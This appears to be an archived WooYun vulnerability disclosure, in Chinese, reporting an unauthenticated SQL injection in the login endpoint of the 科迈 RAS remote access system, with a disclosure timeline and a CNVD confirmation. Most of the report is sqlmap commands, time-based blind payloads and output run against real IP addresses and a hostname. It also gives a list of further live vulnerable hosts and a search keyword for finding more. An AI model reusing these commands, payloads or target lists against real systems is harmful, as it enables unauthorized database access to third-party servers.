乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-15: 细节已通知厂商并且等待厂商处理中 2015-07-17: 厂商已经确认,细节仅向厂商公开 2015-07-20: 细节向第三方安全合作伙伴开放 2015-09-10: 细节向核心白帽子及相关领域专家公开 2015-09-20: 细节向普通白帽子公开 2015-09-30: 细节向实习白帽子公开 2015-10-15: 细节向公众公开
科迈RAS远程快速接入系统无需登陆SQL注入
科迈RAS远程快速接入系统,标准版客户端在登录处存在SQL注入漏洞搜索关键字:科迈RAS
还是有很多案例的那几个举例:
python sqlmap.py -u "http://218.91.204.132:8080/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d=" --dbms="mysql"injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n][21:11:07] [INFO] testing 'MySQL UNION query (71) - 1 to 20 columns'[21:11:16] [INFO] checking if the injection point on GET parameter 'a' is a false positiveGET parameter 'a' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 339 HTTP(s) requests:---Parameter: a (GET) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: t=&a=123' AND (SELECT * FROM (SELECT(SLEEP(5)))JarV) AND 'aSBL'='aSBL&b=32&c=undefined&d=---[21:11:39] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: MySQL 5.0.11[21:11:39] [INFO] fetched data logged to text files under 'C:\Users\xfkxfk\.sqlmap\output\218.91.204.132'[*] shutting down at 21:11:39
python sqlmap.py -u "http://61.182.242.18:8080/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d=" --dbms="mysql"sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: a (GET) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: t=&a=123' AND (SELECT * FROM (SELECT(SLEEP(5)))zwjn) AND 'NlSP'='NlSP&b=32&c=undefined&d=---[21:21:11] [INFO] testing MySQLdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n][21:21:27] [INFO] confirming MySQL[21:21:27] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[21:21:38] [INFO] adjusting time delay to 1 second due to good response times[21:21:38] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: MySQL >= 5.0.0[21:21:38] [INFO] fetched data logged to text files under 'C:\Users\xfkxfk\.sqlmap\output\61.182.242.18'[*] shutting down at 21:21:38
python sqlmap.py -u "http://tianyicnc.meibu.com:800/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d=" --dbssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: a (GET) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: t=&a=123' AND (SELECT * FROM (SELECT(SLEEP(5)))orFh) AND 'RZuz'='RZuz&b=32&c=undefined&d=---[21:22:52] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: MySQL 5.0.11[21:22:52] [INFO] fetching database names[21:22:52] [INFO] fetching number of databases[21:22:52] [INFO] resumed: 3[21:22:52] [INFO] resumed: information_schema[21:22:52] [INFO] resumed: mysql[21:22:52] [INFO] resumed: rasdatabaseavailable databases [3]:[*] information_schema[*] mysql[*] rasdatabase[21:22:52] [INFO] fetched data logged to text files under 'C:\Users\xfkxfk\.sqlmap\output\tianyicnc.meibu.com'[*] shutting down at 21:22:52
部分案例:
http://218.91.204.132:8080/http://202.103.252.103/http://202.104.138.33/http://221.226.23.10:81/http://222.184.237.178:81/http://114.80.129.171:8080http://124.160.67.214http://58.251.164.97/http://115.238.32.206:8888/http://202.104.138.40/http://221.226.184.125:81/......
危害等级:高
漏洞Rank:11
确认时间:2015-07-17 16:55
CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。
暂无